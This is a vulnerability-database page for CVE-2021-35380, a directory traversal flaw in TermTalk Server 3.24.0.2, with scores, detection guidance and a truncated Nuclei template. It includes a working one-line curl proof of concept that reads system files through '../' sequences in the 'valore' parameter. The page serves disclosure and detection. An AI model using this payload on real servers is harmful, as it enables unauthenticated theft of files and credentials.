CVE-2021-35380
published 2022-02-15CVE-2021-35380: A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to…
PriorityP270high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
38.95%
98.4th percentile
A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download (http://url:port/file?valore).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| solari | termtalk_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated GET requests to the /file endpoint with a 'valore' parameter containing directory traversal sequences (e.g., '../') targeting TermTalk Server. ↗
- →HTTP response body containing all three strings 'bit app support', 'fonts', and 'extensions' simultaneously indicates successful exploitation via win.ini file read. ↗
- →Flag GET requests where the 'valore' query parameter traverses outside the web root (multiple '../' sequences) on any host running TermTalk Server 3.24.0.2 — no authentication is required by the attacker. ↗
- ·The vulnerability is fixed in TermTalk Server version 3.26.1.7; detections should be scoped to instances running version 3.24.0.2 or earlier. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
exploitdb·2022-01-05
CVE-2021-35380 TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
---
# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Date: 03/01/2022
# Exploit Author: Fabiano Golluscio @ Swascan
# Vendor Homepage: https://www.solari.it/it/
# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
# Version: 3.24.0.2
# Fixed Version: 3.26.1.7
# Reference: https://www.swascan.com/solari-di-udine/
POC
curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts
Nuclei
TermTalk Server 3.24.0.2 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2021-35380 [HIGH] TermTalk Server 3.24.0.2 - Local File Inclusion
TermTalk Server 3.24.0.2 - Local File Inclusion
TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
Template:
id: CVE-2021-35380
info:
name: TermTalk Server 3.24.0.2 - Local File Inclusion
author: fxploit
severity: high
description: |
TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, a
No writeups or analysis indexed.
2022-02-15
Published